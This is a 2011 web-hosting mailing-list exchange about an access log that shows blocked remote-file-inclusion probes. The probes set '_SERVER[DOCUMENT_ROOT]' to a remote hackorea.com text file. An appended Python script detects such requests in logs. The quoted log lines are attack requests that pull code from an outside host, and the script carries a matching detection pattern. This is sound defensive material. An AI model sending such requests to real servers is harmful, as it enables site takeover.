[BlueOnyx:08493] Re: Making sense of log files...
Jeff Folk
jfolk at qzoneinc.com
Fri Sep 16 08:54:53 -05 2011
On Sep 16, 2011, at 8:11 AM, Wayne Michael wrote:
>
> Typically I haven't taken the time to monitor all my log files.
>
> But recently I've been paying more attention to them.
>
> This is the log from dfix:
>
> Warning: Blocking 210.127.253.246
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 301 - "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:38 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:50:40 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:05 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 301 - "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:06 -0400] "GET /?_SERVERDOCUMENT_ROOT=http://www.hackorea.com/d1.txt???
> HTTP/1.1" 200 21696 "-" "Mozilla/5.0"
>
> www.wrmichael.com 210.127.253.246 - - [14/Sep/2011:18:52:24 -0400] "GET /?p=1693////?_SERVER[DOCUMENT_ROOT]=http://www.hackorea.com/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
>
>
>
> Not really sure what it means other than it blocked the IP address.
>
> ?p=1693 is a valid link on my site. Does that mean this is the page they tried to take over and they are coming from hackorea?
>
> Anything to worry about?
>
> Thanks,
>
> Wayne
That is someone in Korea trying to use a code injection vulnerability, but dfix sensed and blocked it. Go dfix!
Is dfix alive for 5701R?
Thanks;
Jeff
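
The requests quoted in the log above set a parameter named after a PHP superglobal (`_SERVER[DOCUMENT_ROOT]`, also seen with the brackets stripped) to a remote URL. The script below is an added example, not part of the original thread and not how dfix works; it finds that pattern in an access log of the same layout, and its sample lines, hosts and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Constructed sample lines in the vhost-prefixed access-log layout quoted above
# (documentation IP ranges and example hosts, not the values from the post).
SAMPLE_LOG = """\
www.example.com 203.0.113.7 - - [14/Sep/2011:18:50:39 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://files.example.net/d1.txt??? HTTP/1.1" 301 - "-" "Mozilla/5.0"
www.example.com 203.0.113.7 - - [14/Sep/2011:18:50:40 -0400] "GET /?p=1693////?_SERVER%5BDOCUMENT_ROOT%5D=http://files.example.net/d1.txt??? HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
www.example.com 198.51.100.20 - - [14/Sep/2011:18:51:02 -0400] "GET /?p=1693 HTTP/1.1" 200 24991 "-" "Mozilla/5.0"
www.example.com 198.51.100.21 - - [14/Sep/2011:18:51:09 -0400] "GET /go?next=http://www.example.org/ HTTP/1.1" 302 - "-" "Mozilla/5.0"
"""

# Layout: vhost, client IP, ident, user, [timestamp], "request line", status, size
LINE_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<size>\S+)'
)
# A PHP superglobal name used as a parameter (bracketed or with the brackets
# stripped) whose value starts with a remote URL scheme.
SUPERGLOBAL_URL_RE = re.compile(
    r'[?&/](?:_SERVER|_GET|_POST|_COOKIE|_REQUEST|_ENV|_FILES|_SESSION|GLOBALS)'
    r'(?:\[[^\]=&]*\]|[A-Za-z_]*)=(?:https?|ftp)://',
    re.IGNORECASE,
)

def decode(target, rounds=3):
    """Percent-decode a few times so %5B and %255B forms are seen as '['."""
    for _ in range(rounds):
        target = unquote(target)
    return target

def find_superglobal_overrides(log_text):
    """Return {client_ip: [(timestamp, status, decoded_target), ...]} for matching requests."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # wrapped or malformed line; a real pipeline would count these
        target = decode(m["target"])
        if SUPERGLOBAL_URL_RE.search(target):
            hits[m["ip"]].append((m["ts"], int(m["status"]), target))
    return dict(hits)

def served_with_200(hits):
    """IPs with a probe answered 200: the page rendered, so those URLs are the ones to review."""
    return sorted(ip for ip, rows in hits.items() if any(s == 200 for _, s, _ in rows))
```

A 200 status only shows that the page was served with the extra parameter present; whether the application acted on it has to be checked in the application itself.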